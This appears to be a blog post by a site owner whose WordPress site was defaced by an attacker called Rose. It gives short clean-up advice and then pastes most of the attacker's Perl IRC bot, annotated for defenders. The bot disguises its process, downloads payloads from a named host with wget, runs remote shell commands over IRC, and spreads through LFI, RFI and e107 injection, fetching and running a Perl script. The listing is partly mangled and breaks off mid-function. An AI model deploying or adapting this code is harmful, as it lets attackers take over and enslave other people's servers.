One of our micro-sites has been hacked by a hacker called Rose who left a rather unpleasant message for all of the world to see.
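If your website has been affected by this rogue trickster (I use the term lightly), you can remove the defacement by replacing your default index.php file with the original, which can be downloaded directly from wordpress.org. Bear in mind that this only undoes the visible change. Going by the bot code below, a compromised server may also be running a Perl process that shows up as "/usr/sbin/apache2 -k start", and may have files such as yahoo.jpg, google.jpg, copy.jpg and paste.jpg sitting in /tmp. Check for those, update WordPress and its plugins, and change your passwords as well.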
In addition, you might want to install the Sentinel plugin, which will notify you if any of your core WordPress install files have been changed and allow you to quickly FTP into your webspace and overwrite the affected files.
For what it's worth, Rose appears to host an IRC bot off the back of hacked sites. The code for this is below (parts of it were mangled when it was pasted here, so it is not complete):
#!/usr/bin/perl
################################################
use HTTP::Request; #
use HTTP::Request::Common; #
use HTTP::Request::Common qw(POST); #
use LWP::Simple; #
use LWP 5.64; #
use LWP::UserAgent; #
use Socket; #
use IO::Socket; #
use IO::Socket::INET; #
use IO::Select; #
use MIME::Base64; #
################################################
#usage perl file.txt irc.ps-x.net
# Bot configuration. For a defender these values are the indicators to search
# for in process lists, proxy/DNS logs and captured IRC traffic.
# Start-up time as a string (scalar localtime), taken once.
my $datetime = localtime;
# Process title that is later written into $0, so the bot is listed under an
# Apache-looking name instead of "perl".
my $fakeproc = "/usr/sbin/apache2 -k start";
# IRC endpoint the bot connects to; the server can be replaced by $ARGV[0]
# further down in the script.
my $ircserver = "irc.manual.keren.la";
my $ircport = "6667";
# Identity used on IRC: nick, USER ident, and the channel joined after the
# server's 001 welcome.
my $nickname = "TAHEDE";
my $ident = "Rose";
my $channel = "#HackeD";
# Nick that parse() sends the "im here" announcement to. Presumably also what
# isAdmin() compares against -- that sub is not part of this listing.
my $admin = "Rose";
my $fullname = "@Rose";
# Tags prepended to the bot's IRC messages, one per scan type.
my $nob0dy = "0,1(4@0nobody)";
my $lfilogo = "0,1(4@0LFI)";
my $rfilogo = "0,1(4@0RFI)";
my $e107logo = "0,1(4@0e107)";
my $xmllogo = "0,1(4@0XML)";
my $sqllogo = "0,1(4@0SQL)";
my $oscologo = "0,1(4@0OSCO)";
my $ossqllogo = "0,1(4@0OSCO-SQL)";
my $e107logosql = "0,1(4@0E107-SQL)";
# Trigger words the main loop matches at the start of incoming PRIVMSG text.
my $lficmd = '!lfi';
my $rficmd = '!rfi';
my $e107cmd = '!e107';
my $xmlcmd = '!xml';
my $oscocmd = '.osco';
my $ossqlcmd = '!aosco';
my $esqlcmd = '!asq';
my $sqlcmd = '!sql';
my $cmdlfi = '!cmdlfi';
my $cmde107 = '!cmde107';
my $cmdxml = '!cmdxml';
# Remote files the bot refers to when it spreads; all sit under one host and
# path, which makes that prefix a useful match for proxy and DNS logs.
# NOTE(review): the .jpg names are presumably a disguise -- the main loop tests
# $injector for a "< ?php" marker, and dor.txt is run with perl elsewhere.
my $injector = "http://geoffsupport.com/wp/cz/yahoo.jpg";
my $botshell = "http://geoffsupport.com/wp/cz/copy.jpg";
my $botshell2 = "http://geoffsupport.com/wp/cz/paste.jpg";
my $planetwork = "http://geoffsupport.com/wp/cz/sh";
my $ikhy = "http://geoffsupport.com/wp/cz/dor.txt";
my @uagents = ("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)",
"Gigabot/3.0 (http://www.gigablast.com/spider.html)",
"gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12",
"IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)",
"Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4",
"Infoseek SideWinder/2.0B (Linux 2.4 i686)",
"Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6",
"Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)",
"Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1",
"Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)",
"Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)");
my $uagent = $uagents[rand(scalar(@uagents))];
my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
my $adm_output = ("uid=");
my $open_output = ("FCKeditor - Connectors Tests");
my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
# Start-up sequence: make the process hard to stop and hard to spot.
# INT, HUP, TERM and CHLD are set to be ignored, so a plain `kill` (SIGTERM)
# or a closed terminal does not end the bot. SIGKILL cannot be ignored.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
# NOTE(review): 'PS' does not look like a standard signal name.
$SIG{'PS'} = 'IGNORE';
# Work from /tmp and pull four files into it through a shell (backticks).
# The file names left behind in /tmp are yahoo.jpg, google.jpg, copy.jpg and
# paste.jpg.
chdir("/tmp");
chop (my $priper = `wget http://geoffsupport.com/wp/cz/yahoo.jpg -O yahoo.jpg;wget http://geoffsupport.com/wp/cz/google.jpg -O google.jpg;wget http://geoffsupport.com/wp/cz/copy.jpg -O copy.jpg;wget http://geoffsupport.com/wp/cz/paste.jpg -O paste.jpg`);
# An optional first command-line argument replaces the configured IRC server.
$ircserver = "$ARGV[0]" if $ARGV[0];
# Overwrite the process title with $fakeproc padded with NUL bytes, so `ps`
# shows the fake name. On Linux the real interpreter is still visible through
# /proc/<pid>/exe.
$0 = "$fakeproc"."\0" x 16;;
# Fork once: the parent exits, the child carries on in the background.
my $pid = fork;
exit if $pid;
# fork returned undef: it failed, so stop with the system error text.
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
# Write one raw IRC protocol line, terminated by a bare "\n".
#   sendraw($socket, $line) - two arguments: write to the given socket
#   sendraw($line)          - otherwise: write to the global $IRC_cur_socket
sub sendraw {
# $#_ is the last index of @_, so 1 means exactly two arguments were passed.
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# Open the TCP connection to the IRC server and register on it.
#   $_[0] nick to use, $_[1] server host, $_[2] server port
# Returns 1 when the socket cannot be created; otherwise it falls through
# after sending the registration lines.
# For defenders: this is the outbound connection to look for -- a TCP session
# from the web host to the configured IRC server and port.
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
# Make this the "current" socket used by sendraw() and add it to the
# IO::Select set the main loop polls.
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
# Per-connection state, keyed by the socket: server host and port, nick, and
# the local address of the connection.
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
# nick() is not part of this listing; presumably it sends the NICK command.
nick("$mynick");
# Text sent as the trailing (real name) field of the USER line.
my $versi = "0,1 G4 o8 o g l4 e ";
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
sleep (1);}}
# Handle one line received from the IRC server (server-level housekeeping
# only; PRIVMSG commands are handled in the main loop).
#   $servarg - the raw line
# Uses the globals $mynick, $IRC_cur_socket and %irc_servers.
sub parse {
my $servarg = shift;
# Keep-alive: answer PING with PONG carrying the same token.
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
}
# Someone changed nick; if it was this bot, record the new nick.
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
# Numeric 433 (nickname already in use): retry with int rand(1) appended.
elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick".int rand(1));
}
# Numeric 001 (welcome): registration succeeded. Store the nick and server
# name, set user mode +i, join $channel and announce the bot to $admin.
# The fixed "Hi <nick> im here !!!" text is a usable match string for
# network monitoring.
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $mynick +i");
sendraw("JOIN $channel");
sleep(2);
sendraw("PRIVMSG $admin :Hi $admin im here !!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
select(undef, undef, undef, 0.01);;
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $ircmsg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $ircmsg);
$ircmsg =~ s/\r\n$//;
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
if ($path eq $mynick) {
if ($msg =~ /^PING (.*)/) {
sendraw("NOTICE $nick :PING $1");
}
if ($msg =~ /^VERSION/) {
sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
}
if ($msg =~ /^TIME/) {
sendraw("NOTICE $nick :TIME ".$datetime."");
}
if (&isAdmin($nick) && $msg eq "!die") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Lompat...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
sendraw("NICK ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
}
if (&isAdmin($nick) && $msg !~ /^!/) {
&shell("$nick","$msg");
}
if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$nick);
}
if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$nick);
}
if (&isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd,$nick);
}
}
else {
if (&isAdmin($nick) && $msg eq "!die") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Lompat...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg eq "!part") {
sendraw("PART $path");
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
eval "$1";
}
##################################################################### HIT
if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$path);
}
if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$path);
}
if ($msg=~ /^$cmde107\s+(.+?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd,$path);
}
##################################################################### HELP COMMAND
if ($msg=~ /^!help/) {
my $helplogo = "0,1(4@0Help)";
&msg("$path","$helplogo ($lficmd|$rficmd|$sqlcmd|$xmlcmd|$oscocmd| [bug][dork] |($e107cmd | $oscocmd | [dork] ))");
}
if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
if (&isFound($injector,"< ?php")) {
&msg("$path","0,1(4@0Injector) ScanneR up!!!");
} else {
&msg("$path","0,1(4@0Injector) ScanneR 4down!!!");
}
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
¬ice("$nick","Fake Process/PID : $fakeproc - $$");
}
##################################################################### RFI SCAN
if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ($1,$2);
&msg("$path","$rfilogo Dork :4 $dork");
&msg("$path","$rfilogo Bugz :4 $bug");
&msg("$path","$rfilogo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,1);
} else {
&msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### LFI SCAN
if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ($1,$2);
&msg("$path","$lfilogo Dork :4 $dork");
&msg("$path","$lfilogo Bugz :4 $bug");
&msg("$path","$lfilogo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,2);
} else {
&msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### e107 SCAN
if ($msg=~ /^$e107cmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logo Dork :4 $dork");
&msg("$path","$e107logo Bugz :4 $bug");
&msg("$path","$e107logo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,3);
} else {
&msg("$path","[ $nick ] $e107logo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### XML SCAN
if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ($1,$2);
&msg("$path","$xmllogo Dork :4 $dork");
&msg("$path","$xmllogo Bugz :4 $bug");
&msg("$path","$xmllogo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,4);
} else {
&msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### SQL SCAN
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$sqllogo Dork :4 $dork");
&msg("$path","$sqllogo Bugz :4 $bug");
&msg("$path","$sqllogo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,5);
}
exit;
}
}
##################################################################### OSCO SCAN
if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ("admin/categories.php/login.php",$1);
&msg("$path","$oscologo Dork :4 $dork");
&msg("$path","$oscologo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,6);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### OSCO2 SCAN
if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
&scan_start($path,$bug,$dork,$engine,12);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### OSCO3 SCAN
if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector," my ($bug,$dork) = ("admin/banner_manager.php/login.php",$1);
&msg("$path","$oscologo Dork :4 $dork");
&msg("$path","$oscologo Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,11);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### E107SQL SCAN
if ($msg=~ /^$esqlcmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logosql Dork :4 $dork")
&msg("$path","$e107logosql Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,13);
}
exit;
}
}
#####################################################################
}
}
for(my $c=0; $c0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$rfilogo(4@$engine) Scan finish"); }
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $dor2 = "http://".$site.$bug.$botshell2."??";
my $cek = &get_content($coba);sleep(1);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ($cek =~ /failed to open stream/i) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
&rfi_xpl($test,$chan,$site);
exit;}
}
}
}
}
}
sub rfi_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $dor = $url.$botshell."??";
my $dor2 = $url.$botshell2."??";
my $test = $url.$injector."??";
my $vuln = $url."(plaNETWORK)";
my $check = &get_content($test);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ( $check =~ /Hacked By Rose/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}
&msg("#HacKeD","$rfilogo(4@VuLn) ".$vuln."(4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)(4@safemode-off)");
&msg("Rose","$rfilogo(4@VuLn) ".$vuln."(4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");
}
else {&msg("$chan","$rfilogo(4@VuLn) ".$vuln." (4@7safemode-on)");}
}
sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$lfilogo(4@$engine) Scan finish"); }
my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site."".$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site."".$bug.$dir."/tmp/pnt%0000";
my $html = &get_content($test);
if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$planetwork.'","/tmp/pnt")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/kodo"); }';
my $res = lfi_env_query($test,encode_base64($code));
&lfi_spread_query($test);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");
&get_content("http://".$site.$bug.$dir."/tmp/kodo%0000");
$res =~ s/\n//g;
if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
my $sys = $1;
$nob0dy = $2;
&msg("#HacKeD","$lfilogo0,1(4@0SHeLL) ".$shell." 0,1(4@0".$sys."))0,1(4@0$nob0dy)");sleep(2);
&msg("Rose","$lfilogo0,1(4@0SHeLL) ".$shell." 0,1(4@0".$sys."))0,1(4@0$nob0dy)");sleep(2);
}
elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
$nob0dy = $2;
my $upload = 'system("killall -9 perl;wget $injector -O version.php");';
my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
my $check = &get_content("http://".$site.$bug.$dir."/tmp/pnt%0000"); sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/kodo%0000");sleep(2);
if ($check =~ /Hacked By Rose/) {
&msg("#HacKeD","$lfilogo0,1(4@0SHeLL) ".$shell." 15(4@".$sys.")0,1(4@0$nob0dy)");sleep(2);
&msg("Rose","$lfilogo0,1(4@0SHeLL) ".$shell." 15(4@".$sys.")0,1(4@0$nob0dy)");sleep(2);
}
else {
&msg("$chan","$lfilogo0,1(4@0SysTem)7 ".$vuln." 15(4@".$sys."))0,1(4@0$nob0dy)");sleep(2);
}
} exit; }
}
else { &msg("$chan","$lfilogo0,1(4@0EnviRon) ".$vuln); }
} exit; } sleep(2);
}
}
}
}
# Send one GET request to $url with the User-Agent header set to a PHP
# snippet that wraps the base64 text in $code, and return the response body.
#   $_[0] URL to request, $_[1] base64-encoded PHP code
# For defenders: the request is recognisable in access logs by a User-Agent
# that contains "eval(base64_decode(" instead of a browser string; the caller
# lfi() builds the URL from a run of "../" ending in /proc/self/environ.
# The fix belongs on the target: never build include paths from request input.
sub lfi_env_query() {
my $url = $_[0];
my $code = $_[1];
# The opening PHP tag appears with a stray space ("< ?") in this listing.
my $ua = LWP::UserAgent->new(agent => "< ?eval(base64_decode('".$code."'));?>");
# Give up on a target after 7 seconds.
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}
# Same request shape as lfi_env_query() (PHP code carried in the User-Agent
# header of a GET to $url), but with a fixed payload and no return value of
# interest: the response is stored in $res and not used.
#   $_[0] URL to request
# The embedded command removes /tmp/dor*, then tries wget, fetch and
# lwp-download in turn to retrieve $ikhy and runs the result with perl.
# For defenders: /tmp/dor.txt and perl processes started from /tmp are the
# host-side traces of this step.
sub lfi_spread_query() {
my $url = $_[0];
my $code = "system('rm -rf /tmp/dor*;cd /tmp;wget $ikhy -O /tmp/dor.txt;perl /tmp/dor.txt;fetch $ikhy -O /tmp/dor.txt;perl dor.txt;lwp-download $ikhy;perl dor.txt');";
my $ua = LWP::UserAgent->new(agent => "< ?eval(base64_decode('".encode_base64($code)."'));?>");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
}
sub e107() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logo Scan finish"); }
my $test = "http://".$site.$bug;
my $code = "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";
my $html = &e107_rce_query($test,$code);
if ($html =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) {
&e107xpl1($chan,$site,$engine);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","e107.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","copy.php");@copy("'.$botshell2.'","paste.php");} elseif(@copy("'.$injector.'","e107_themes/e107.php")) { echo "ikhy_dthem";@copy("'.$botshell.'","e107_themes/copy.php");@copy("'.$botshell2.'","e107_themes/paste.php");} elseif(@copy("'.$injector.'","e107_plugins/e107.php")) { echo "ikhy_dplug";@copy("'.$botshell.'","e107_plugins/copy.php");@copy("'.$botshell2.'","e107_plugins/paste.php");} elseif(@copy("'.$injector.'","e107_images/e107.php")) { echo "ikhy_dima";@copy("'.$botshell.'","e107_images/copy.php");@copy("'.$botshell2.'","e107_images/paste.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&get_content("http://".$site."copy.php");
&get_content("http://".$site."paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
elsif ($res =~ /ikhy_dthem/) {
&get_content("http://".$site."e107_themes/copy.php");
&get_content("http://".$site."e107_themes/paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
elsif ($res =~ /ikhy_dplug/) {
&get_content("http://".$site."e107_plugins/copy.php");
&get_content("http://".$site."e107_plugins/paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_plugins/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_plugins/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
elsif ($res =~ /ikhy_dima/) {
&get_content("http://".$site."e107_images/copy.php");
&get_content("http://".$site."e107_images/paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_images/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_images/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
else {
&msg("$chan","$e107logo0,1(4@0Vuln)7 ".$test." 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
&e107_spread_query($test);
sleep(2);
} exit; } sleep(2);
}
elsif ($html =~ /v0pCr3w
sys:(.+?)
/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
